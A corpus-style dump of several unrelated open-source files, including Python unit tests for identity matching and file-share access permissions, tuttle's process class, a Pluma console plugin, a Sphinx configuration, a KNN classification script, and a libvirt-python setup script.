self.john_smith = UniqueIdentity('John Smith')
self.john_smith.identities = [Identity(email='[email protected]', name='John Smith',
source='scm', uuid='John Smith'),
Identity(name='John Smith',
source='scm', uuid='John Smith'),
Identity(username='jsmith',
source='scm', uuid='John Smith')]
self.jsmith = UniqueIdentity('J. Smith')
self.jsmith.identities = [Identity(name='J. Smith', username='john_smith',
source='alt', uuid='J. Smith'),
Identity(name='John Smith', username='jsmith',
source='alt', uuid='J. Smith'),
Identity(email='jsmith',
source='alt', uuid='J. Smith')]
self.jane_rae = UniqueIdentity('Jane Rae')
self.jane_rae.identities = [Identity(name='Janer Rae',
source='mls', uuid='Jane Rae'),
Identity(email='[email protected]', name='Jane Rae Doe',
source='mls', uuid='Jane Rae')]
self.js_alt = UniqueIdentity('john_smith')
self.js_alt.identities = [Identity(name='J. Smith', username='john_smith',
source='scm', uuid='john_smith'),
Identity(username='john_smith',
source='mls', uuid='john_smith'),
Identity(username='Smith. J',
source='mls', uuid='john_smith'),
Identity(email='[email protected]', name='Smith. J',
source='mls', uuid='john_smith')]
self.jrae = UniqueIdentity('jrae')
self.jrae.identities = [Identity(email='[email protected]', name='Jane Rae Doe',
source='mls', uuid='jrae'),
Identity(name='jrae', source='mls', uuid='jrae'),
Identity(name='jrae', source='scm', uuid='jrae')]
def test_match_email(self):
"""Test whether the function finds every possible matching using email matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailMatcher()
result = match([], matcher)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher)
self.assertEqual(len(result), 4)
self.assertListEqual(result,
[[self.john_smith, self.js_alt],
[self.jane_rae], [self.jrae], [self.jsmith]])
def test_match_email_name(self):
"""Test whether the function finds every possible matching using email-name matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailNameMatcher()
result = match([], matcher)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher)
self.assertEqual(len(result), 2)
self.assertListEqual(result,
[[self.jsmith, self.john_smith, self.js_alt],
[self.jane_rae, self.jrae]])
def test_match_email_fast_mode(self):
"""Test matching in fast mode using email matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailMatcher()
result = match([], matcher, fastmode=True)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher, fastmode=True)
self.assertEqual(len(result), 4)
self.assertListEqual(result,
[[self.john_smith, self.js_alt],
[self.jane_rae], [self.jrae], [self.jsmith]])
def test_match_email_name_fast_mode(self):
"""Test matching in fast mode using email-name matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailNameMatcher()
result = match([], matcher, fastmode=True)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher, fastmode=True)
self.assertEqual(len(result), 2)
self.assertListEqual(result,
[[self.jsmith, self.john_smith, self.js_alt],
[self.jane_rae, self.jrae]])
def test_matcher_error(self):
"""Test if it raises an error when the matcher is not valid"""
self.assertRaises(TypeError, match, [], None)
self.assertRaises(TypeError, match, [], "")
def test_matcher_not_supported_fast_mode(self):
"""Test if it raises and error when a matcher does not supports the fast mode"""
matcher = IdentityMatcher()
self.assertRaises(MatcherNotSupportedError,
match, [], matcher, True)
if __name__ == "__main__":
unittest.main()
| gpl-3.0 | 5,165,033,627,049,388,000 | 38.282143 | 95 | 0.582508 | false |
dataflow/DataStage | test/FileShare/tests/TestFileUserAPublic.py | 1 | 11291 | # ---------------------------------------------------------------------
#
# Copyright (c) 2012 University of Oxford
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, --INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# ---------------------------------------------------------------------
# $Id: TestFileUserAPublic.py 1047 2009-01-15 14:48:58Z graham $
#
# Unit testing for FileUserAPublic module
#
import os
import sys
import httplib
import urllib2
import unittest
import subprocess
sys.path.append("../..")
from TestConfig import TestConfig
# Initialize authenticated HTTP connection opener
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, TestConfig.webdavbaseurl, TestConfig.collabname, TestConfig.collabpass)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
class TestFileUserAPublic(unittest.TestCase):
def setUp(self):
mountcommand = ( '/sbin/mount.cifs //%(host)s/files/%(userA)s %(mountpt)s -o rw,user=%(user)s,password=%(pass)s,nounix,forcedirectio' %
{ 'host': TestConfig.hostname
, 'userA': TestConfig.userAname
, 'user': TestConfig.collabname
, 'mountpt': TestConfig.cifsmountpoint
, 'pass': TestConfig.collabpass
} )
status=os.system(mountcommand)
self.assertEqual(status, 0, 'CIFS Mount failure')
return
def tearDown(self):
os.system('/sbin/umount.cifs '+TestConfig.cifsmountpoint)
return
# Test cases
def testNull(self):
assert (True), "True expected"
return
def testReadMeSSH(self):
f=os.system(ssh_string)
print f
return
def testReadMeCIFS(self):
# Test assumes DATASTAGE shared file system is mounted at mountpoint
# Open README file
f=None
try:
f = open(TestConfig.cifsmountpoint+'/'+TestConfig.readmefile)
except:
pass
assert (f==None), "Public user can read User A's file!"
return
def testCreateFileCIFS(self):
f=None
try:
f = open(TestConfig.cifsmountpoint+'/testCreateFile.tmp','w+')
except:
pass
assert (f==None), "Public user can create files in User A's filespace!"
return
def testUpdateFileCIFS(self):
f=None
try:
f = open(TestConfig.cifsmountpoint+'/'+'TestConfig.readmefile','w+')
except:
pass
assert (f==None), "Public user can open User A's files for writing!"
return
def testDeleteFileCIFS(self):
filename1 = TestConfig.cifsmountpoint+'/testCreateFile.tmp'
filename2 = TestConfig.cifsmountpoint+'/testUpdateFile.tmp'
# Test and delete first file
try:
s = os.stat(filename1)
except:
assert (False), "File "+filename1+" not found or other stat error"
os.remove(filename1)
try:
s = os.stat(filename1)
assert (False), "File "+filename1+" not deleted"
except:
pass
# Test and delete second file
try:
s = os.stat(filename2)
except:
assert (False), "File "+filename2+" not found or other stat error"
os.remove(filename2)
try:
s = os.stat(filename2)
assert (False), "File "+filename2+" not deleted"
except:
pass
return
def testReadMeDAVfs(self):
# Test assumes DATASTAGE shared file system is mounted at mountpoint
# Open README file
status=os.system('mount '+TestConfig.webdavmountpoint)
self.assertEqual(status, 0, 'DAVfs Mount failure')
f = open(TestConfig.webdavmountpoint+'/'+TestConfig.readmefile)
assert (f), "README file open failed (DAVfs)"
# Read first line
l = f.readline()
# Close file
f.close()
# Check first line
self.assertEqual(l, TestConfig.readmetext, 'Unexpected README content')
os.system('umount '+TestConfig.webdavmountpoint)
return
def testCreateFileDAVfs(self):
status=os.system('mount '+TestConfig.webdavmountpoint)
self.assertEqual(status, 0, 'DAVfs Mount failure')
f = open(TestConfig.webdavmountpoint+'/testCreateWebDAVFile.tmp','w+')
assert (f), "File creation failed"
f.write('Test creation of file\n')
f.close()
f = open(TestConfig.webdavmountpoint+'/testCreateWebDAVFile.tmp','r')
l = f.readline()
f.close()
self.assertEqual(l, 'Test creation of file\n', 'Unexpected file content')
os.system('umount '+TestConfig.webdavmountpoint)
return
def testUpdateFileDAVfs(self):
status=os.system('mount '+TestConfig.webdavmountpoint)
self.assertEqual(status, 0, 'DAVfs Mount failure')
filename = TestConfig.webdavmountpoint+'/testUpdateWebDAVFile.tmp'
f = open(filename,'w+')
assert (f), "File creation failed"
f.write('Test creation of file\n')
f.close()
f = open(filename,'a+')
f.write('Test update of file\n')
f.close()
f = open(filename,'r')
l1 = f.readline()
l2 = f.readline()
f.close()
self.assertEqual(l1, 'Test creation of file\n', 'Unexpected file content: l1')
self.assertEqual(l2, 'Test update of file\n', 'Unexpected file content: l2')
os.system('umount '+TestConfig.webdavmountpoint)
return
def testDeleteFileDAVfs(self):
status=os.system('mount '+TestConfig.webdavmountpoint)
self.assertEqual(status, 0, 'DAVfs Mount failure')
filename1 = TestConfig.webdavmountpoint+'/testCreateWebDAVFile.tmp'
filename2 = TestConfig.webdavmountpoint+'/testUpdateWebDAVFile.tmp'
# Test and delete first file
try:
s = os.stat(filename1)
except:
assert (False), "File "+filename1+" not found or other stat error"
os.remove(filename1)
try:
s = os.stat(filename1)
assert (False), "File "+filename1+" not deleted"
except:
pass
# Test and delete second file
try:
s = os.stat(filename2)
except:
assert (False), "File "+filename2+" not found or other stat error"
os.remove(filename2)
try:
s = os.stat(filename2)
assert (False), "File "+filename2+" not deleted"
except:
pass
os.system('umount '+TestConfig.webdavmountpoint)
return
def testReadMeHTTP(self):
thepage=None
try:
pagehandle = urllib2.urlopen(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/'+TestConfig.readmefile)
thepage = pagehandle.read()
except:
pass
assert (thepage==None), "Public user can read User A's file by HTTP!"
return
def testCreateFileHTTP(self):
thepage=None
createstring="Testing file creation with WebDAV"
try:
req=urllib2.Request(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp', data=createstring)
req.add_header('Content-Type', 'text/plain')
req.get_method = lambda: 'PUT'
url=opener.open(req)
phan=urllib2.urlopen(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp')
thepage=phan.read()
except:
pass
assert (thepage==None), "Public user can create a file in User A's filespace by HTTP!"
return
def testUpdateFileHTTP(self):
thepage=None
updatestring="Testing file modification with WebDAV"
try:
req=urllib2.Request(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp', data=updatestring)
req.get_method = lambda: 'PUT'
url=opener.open(req)
phan=urllib2.urlopen(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp')
thepage=phan.read()
except:
pass
assert (thepage!=updatestring), "Public user can update User A's file by HTTP!"
return
def testDeleteFileHTTP(self):
req=urllib2.Request(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp')
req.get_method = lambda: 'DELETE'
url=opener.open(req)
return
# Sentinel/placeholder tests
def testUnits(self):
assert (True)
def testComponents(self):
assert (True)
def testIntegration(self):
assert (True)
def testPending(self):
assert (False), "No pending test"
# Assemble test suite
from MiscLib import TestUtils
def getTestSuite(select="unit"):
"""
Get test suite
select is one of the following:
"unit" return suite of unit tests only
"component" return suite of unit and component tests
"all" return suite of unit, component and integration tests
"pending" return suite of pending tests
name a single named test to be run
"""
testdict = {
"unit":
[ "testUnits"
, "testNull"
],
"component":
[ "testComponents"
, "testReadMeCIFS"
, "testReadMeHTTP"
, "testCreateFileCIFS"
, "testCreateFileHTTP"
, "testUpdateFileCIFS"
, "testUpdateFileHTTP"
],
"integration":
[ "testIntegration"
],
"pending":
[ "testPending"
, "testReadMeSSH"
, "testReadMeDAVfs"
, "testCreateFileDAVfs"
, "testUpdateFileDAVfs"
, "testDeleteFileDAVfs"
, "testDeleteFileCIFS"
, "testDeleteFileHTTP"
]
}
return TestUtils.getTestSuite(TestFileUserAPublic, testdict, select=select)
# Run unit tests directly from command line
if __name__ == "__main__":
TestUtils.runTests("TestFileUserAPublic", getTestSuite, sys.argv)
# End.
| mit | 4,551,241,056,492,288,500 | 33.741538 | 143 | 0.604818 | false |
lexman/tuttle | tuttle/process.py | 1 | 4297 | # -*- coding: utf8 -*-
from time import time
class Process:
""" Class wrapping a process. A process has some input resources, some output resources,
some code that produces outputs from inputs, a processor that handle the language specificities
"""
def __init__(self, processor, filename, line_num):
self._start = None
self._end = None
self._processor = processor
self._filename = filename
self._line_num = line_num
self._inputs = []
self._outputs = []
self._code = ""
self.log_stdout = None
self.log_stderr = None
self._reserved_path = None
self._success = None
self._error_message = None
self._id = "{}_{}".format(self._filename, self._line_num)
@property
def start(self):
return self._start
@property
def end(self):
return self._end
@property
def id(self):
return self._id
@property
def code(self):
return self._code
# TODO Use a setter ?
def set_code(self, code):
self._code = code
@property
def success(self):
return self._success
@property
def error_message(self):
return self._error_message
@property
def processor(self):
return self._processor
def add_input(self, input_res):
self._inputs.append(input_res)
def add_output(self, output):
self._outputs.append(output)
def iter_inputs(self):
for res in self._inputs:
yield res
def iter_outputs(self):
for res in self._outputs:
yield res
def has_outputs(self):
return len(self._outputs) > 0
def has_input(self, resource):
return resource in self._inputs
def input_urls(self):
return {resource.url for resource in self._inputs}
def output_urls(self):
return {resource.url for resource in self._outputs}
def sorted_inputs_string(self):
sorted_inputs_urls = sorted([resource.url for resource in self.iter_inputs()])
return ",".join(sorted_inputs_urls)
def depends_on_process(self, process):
""" Returns True if self deprends on a resource created by process"""
for output_resource in process.iter_outputs():
if self.has_input(output_resource):
return True
return False
def pick_an_output(self):
if not self.has_outputs():
return None
return self._outputs[0]
def retrieve_execution_info(self, process):
""" Copy the execution info (all the properties set by function run()) from another process
:param process:
:return:
"""
self._start = process.start
self._end = process.end
self._success = process.success
self.log_stdout = process.log_stdout
self.log_stderr = process.log_stderr
self._reserved_path = process._reserved_path
def reset_execution_info(self):
""" Reset the execution info (all the properties set by function run()) because the resources produced
by this process have been invalidated
:return:
"""
self._start = None
self._end = None
self.log_stdout = None
self.log_stderr = None
self._success = None
def static_check(self):
"""
Runs a verification that the process won't obviously fail. This is used for static analysis before any process
is run
"""
self._processor.static_check(self)
def assign_paths(self, reserved_path, log_stdout, log_stderr):
assert reserved_path is not None
self._reserved_path = reserved_path
self.log_stdout = log_stdout
self.log_stderr = log_stderr
def set_start(self):
self._start = time()
def set_end(self, success, error_msg):
self._end = time()
self._success = success
self._error_message = error_msg
def missing_outputs(self):
"""
:return: True if all input resources for this process exist, False otherwise
"""
result = []
for resource in self.iter_outputs():
if not resource.exists():
result.append(resource)
return result | mit | 1,463,314,768,997,302,000 | 27.091503 | 118 | 0.593903 | false |
mate-desktop/pluma | plugins/pythonconsole/pythonconsole/__init__.py | 1 | 2589 | # -*- coding: utf-8 -*-
# __init__.py -- plugin object
#
# Copyright (C) 2006 - Steve Frécinaux
# Copyright (C) 2012-2021 MATE Developers
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA.
# Parts from "Interactive Python-GTK Console" (stolen from epiphany's console.py)
# Copyright (C), 1998 James Henstridge <[email protected]>
# Copyright (C), 2005 Adam Hooper <[email protected]>
# Bits from pluma Python Console Plugin
# Copyrignt (C), 2005 Raphaël Slinckx
from gi.repository import GObject, Gtk, Peas, PeasGtk, Pluma
from .console import PythonConsole
from .config import PythonConsoleConfigWidget
from .config import PythonConsoleConfig
PYTHON_ICON = 'text-x-python'
class PythonConsolePlugin(GObject.Object, Pluma.WindowActivatable, PeasGtk.Configurable):
__gtype_name__ = "PythonConsolePlugin"
window = GObject.Property(type=Pluma.Window)
def __init__(self):
GObject.Object.__init__(self)
self.config_widget = None
def do_activate(self):
self._console = PythonConsole(namespace = {'__builtins__' : __builtins__,
'pluma' : Pluma,
'window' : self.window})
self._console.eval('print("You can access the main window through ' \
'\'window\' :\\n%s" % window)', False)
bottom = self.window.get_bottom_panel()
image = Gtk.Image()
image.set_from_icon_name(PYTHON_ICON, Gtk.IconSize.MENU)
bottom.add_item(self._console, _('Python Console'), image)
def do_deactivate(self):
self._console.stop()
bottom = self.window.get_bottom_panel()
bottom.remove_item(self._console)
def do_create_configure_widget(self):
if not self.config_widget:
self.config_widget = PythonConsoleConfigWidget(self.plugin_info.get_data_dir())
return self.config_widget.configure_widget()
# ex:et:ts=4:
| gpl-2.0 | 8,445,804,338,091,260,000 | 38.19697 | 91 | 0.669115 | false |
gimler/guzzle-docs | conf.py | 1 | 7580 | # -*- coding: utf-8 -*-
#
# Guzzle documentation build configuration file, created by
# sphinx-quickstart on Tue Mar 1 22:54:52 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True, linenos=1)
lexers['php-annotations'] = PhpLexer(startinline=True, linenos=1)
primary_domain = 'php'
# (Optional) Use a shorter name to conserve nav. bar space.
html_short_title = "Guzzle"
# (Optional) Logo. Should be exactly 32x32 px to fit the nav. bar.
# Path should be relative to the html_static_path setting (e.g.,
# "_static") in source.
# html_logo = "my_logo.png"
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['theme/_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Guzzle'
copyright = u'2012, Michael Dowling'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.6'
# The full version, including alpha/beta/rc tags.
release = '2.6.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'php'
highlight_language = 'php'
linenos = True
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'github'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
sys.path.append(os.path.abspath('theme'))
html_theme_path = ['theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['theme/_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Guzzledoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Guzzle.tex', u'Guzzle Documentation',
u'Michael Dowling', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'guzzle', u'Guzzle Documentation',
[u'Michael Dowling'], 1)
]
| mit | 6,383,357,341,490,664,000 | 31.532189 | 80 | 0.710158 | false |
dikien/Machine-Learning-Newspaper | nytimes/step4_knn.py | 1 | 1812 | # -*- coding: UTF-8 -*-
from time import time
from step3_feature_engineering import preprocess_2
from sklearn.neighbors import KNeighborsClassifier
from sklearn.cross_validation import KFold
from sklearn import grid_search
features, labels, vectorizer, selector, le = preprocess_2("pkl/article_2_people.pkl", "pkl/lable_2_people.pkl")
# Constructing the k-fold cross validation iterator (k=5)
cv = KFold(n=features.shape[0], # total number of samples
n_folds=5, # number of folds the dataset is divided into
shuffle=True,
random_state=123)
t0 = time()
parameters = {'algorithm':('ball_tree', 'kd_tree', 'brute'), 'n_neighbors':[5, 50, 500]}
clf = grid_search.GridSearchCV(KNeighborsClassifier(), parameters)
clf.fit(features, labels)
print "escape time : ", round(time()-t0, 3), "s"
print "best score is %s" % clf.best_score_
print "best parameter is %s" % clf.best_params_
print clf.grid_scores_
'''
escape time : 121.11 s
best score is 0.587025316456
best parameter is {'n_neighbors': 50, 'algorithm': 'ball_tree'}
[mean: 0.58386, std: 0.02612, params: {'n_neighbors': 5, 'algorithm': 'ball_tree'}, mean: 0.58703, std: 0.09922, params: {'n_neighbors': 50, 'algorithm': 'ball_tree'}, mean: 0.56448, std: 0.06137, params: {'n_neighbors': 500, 'algorithm': 'ball_tree'}, mean: 0.55380, std: 0.03316, params: {'n_neighbors': 5, 'algorithm': 'kd_tree'}, mean: 0.58703, std: 0.09922, params: {'n_neighbors': 50, 'algorithm': 'kd_tree'}, mean: 0.56448, std: 0.06137, params: {'n_neighbors': 500, 'algorithm': 'kd_tree'}, mean: 0.57120, std: 0.01555, params: {'n_neighbors': 5, 'algorithm': 'brute'}, mean: 0.58703, std: 0.09922, params: {'n_neighbors': 50, 'algorithm': 'brute'}, mean: 0.56448, std: 0.06137, params: {'n_neighbors': 500, 'algorithm': 'brute'}]
''' | bsd-3-clause | 6,622,033,397,770,966,000 | 52.323529 | 738 | 0.672737 | false |
hinesmr/libvirt-python | setup.py | 1 | 10005 | #!/usr/bin/python
from distutils.core import setup, Extension, Command
from distutils.command.build import build
from distutils.command.clean import clean
from distutils.command.sdist import sdist
from distutils.dir_util import remove_tree
from distutils.util import get_platform
from distutils.spawn import spawn
from distutils.errors import DistutilsExecError
import distutils
import sys
import os
import os.path
import re
import time
MIN_LIBVIRT = "0.9.11"
MIN_LIBVIRT_LXC = "1.0.2"
# Hack to stop 'pip install' failing with error
# about missing 'build' dir.
if not os.path.exists("build"):
os.mkdir("build")
_pkgcfg = -1
def get_pkgcfg(do_fail=True):
global _pkgcfg
if _pkgcfg == -1:
_pkgcfg = distutils.spawn.find_executable("pkg-config")
if _pkgcfg is None and do_fail:
raise Exception("pkg-config binary is required to compile libvirt-python")
return _pkgcfg
def check_minimum_libvirt_version():
spawn([get_pkgcfg(),
"--print-errors",
"--atleast-version=%s" % MIN_LIBVIRT,
"libvirt"])
def have_libvirt_lxc():
try:
spawn([get_pkgcfg(),
"--atleast-version=%s" % MIN_LIBVIRT_LXC,
"libvirt"])
return True
except DistutilsExecError:
return False
def get_pkgconfig_data(args, mod, required=True):
"""Run pkg-config to and return content associated with it"""
f = os.popen("%s %s %s" % (get_pkgcfg(), " ".join(args), mod))
line = f.readline()
if line is not None:
line = line.strip()
if line is None or line == "":
if required:
raise Exception("Cannot determine '%s' from libvirt pkg-config file" % " ".join(args))
else:
return ""
return line
def get_api_xml_files():
"""Check with pkg-config that libvirt is present and extract
the API XML file paths we need from it"""
libvirt_api = get_pkgconfig_data(["--variable", "libvirt_api"], "libvirt")
offset = libvirt_api.index("-api.xml")
libvirt_qemu_api = libvirt_api[0:offset] + "-qemu-api.xml"
offset = libvirt_api.index("-api.xml")
libvirt_lxc_api = libvirt_api[0:offset] + "-lxc-api.xml"
return (libvirt_api, libvirt_qemu_api, libvirt_lxc_api)
def get_module_lists():
"""
Determine which modules we are actually building, and all their
required config
"""
if get_pkgcfg(do_fail=False) is None:
return [], []
c_modules = []
py_modules = []
ldflags = get_pkgconfig_data(["--libs-only-L"], "libvirt", False)
cflags = get_pkgconfig_data(["--cflags"], "libvirt", False)
module = Extension('libvirtmod',
sources = ['libvirt-override.c', 'build/libvirt.c', 'typewrappers.c', 'libvirt-utils.c'],
libraries = [ "virt" ],
include_dirs = [ "." ])
if cflags != "":
module.extra_compile_args.append(cflags)
if ldflags != "":
module.extra_link_args.append(ldflags)
c_modules.append(module)
py_modules.append("libvirt")
moduleqemu = Extension('libvirtmod_qemu',
sources = ['libvirt-qemu-override.c', 'build/libvirt-qemu.c', 'typewrappers.c', 'libvirt-utils.c'],
libraries = [ "virt-qemu" ],
include_dirs = [ "." ])
if cflags != "":
moduleqemu.extra_compile_args.append(cflags)
if ldflags != "":
moduleqemu.extra_link_args.append(ldflags)
c_modules.append(moduleqemu)
py_modules.append("libvirt_qemu")
if have_libvirt_lxc():
modulelxc = Extension('libvirtmod_lxc',
sources = ['libvirt-lxc-override.c', 'build/libvirt-lxc.c', 'typewrappers.c', 'libvirt-utils.c'],
libraries = [ "virt-lxc" ],
include_dirs = [ "." ])
if cflags != "":
modulelxc.extra_compile_args.append(cflags)
if ldflags != "":
modulelxc.extra_link_args.append(ldflags)
c_modules.append(modulelxc)
py_modules.append("libvirt_lxc")
return c_modules, py_modules
###################
# Custom commands #
###################
class my_build(build):
def run(self):
check_minimum_libvirt_version()
apis = get_api_xml_files()
self.spawn([sys.executable, "generator.py", "libvirt", apis[0]])
self.spawn([sys.executable, "generator.py", "libvirt-qemu", apis[1]])
if have_libvirt_lxc():
self.spawn([sys.executable, "generator.py", "libvirt-lxc", apis[2]])
build.run(self)
class my_sdist(sdist):
user_options = sdist.user_options
description = "Update libvirt-python.spec; build sdist-tarball."
def initialize_options(self):
self.snapshot = None
sdist.initialize_options(self)
def finalize_options(self):
if self.snapshot is not None:
self.snapshot = 1
sdist.finalize_options(self)
def gen_rpm_spec(self):
f1 = open('libvirt-python.spec.in', 'r')
f2 = open('libvirt-python.spec', 'w')
for line in f1:
f2.write(line
.replace('@PY_VERSION@', self.distribution.get_version())
.replace('@C_VERSION@', MIN_LIBVIRT))
f1.close()
f2.close()
def gen_authors(self):
f = os.popen("git log --pretty=format:'%aN <%aE>'")
authors = []
for line in f:
line = " " + line.strip()
if line not in authors:
authors.append(line)
authors.sort(key=str.lower)
f1 = open('AUTHORS.in', 'r')
f2 = open('AUTHORS', 'w')
for line in f1:
f2.write(line.replace('@AUTHORS@', "\n".join(authors)))
f1.close()
f2.close()
def gen_changelog(self):
f1 = os.popen("git log '--pretty=format:%H:%ct %an <%ae>%n%n%s%n%b%n'")
f2 = open("ChangeLog", 'w')
for line in f1:
m = re.match(r'([a-f0-9]+):(\d+)\s(.*)', line)
if m:
t = time.gmtime(int(m.group(2)))
f2.write("%04d-%02d-%02d %s\n" % (t.tm_year, t.tm_mon, t.tm_mday, m.group(3)))
else:
if re.match(r'Signed-off-by', line):
continue
f2.write(" " + line.strip() + "\n")
f1.close()
f2.close()
def run(self):
if not os.path.exists("build"):
os.mkdir("build")
if os.path.exists(".git"):
try:
self.gen_rpm_spec()
self.gen_authors()
self.gen_changelog()
sdist.run(self)
finally:
files = ["libvirt-python.spec",
"AUTHORS",
"ChangeLog"]
for f in files:
if os.path.exists(f):
os.unlink(f)
else:
sdist.run(self)
class my_rpm(Command):
user_options = []
description = "Build src and noarch rpms."
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
"""
Run sdist, then 'rpmbuild' the tar.gz
"""
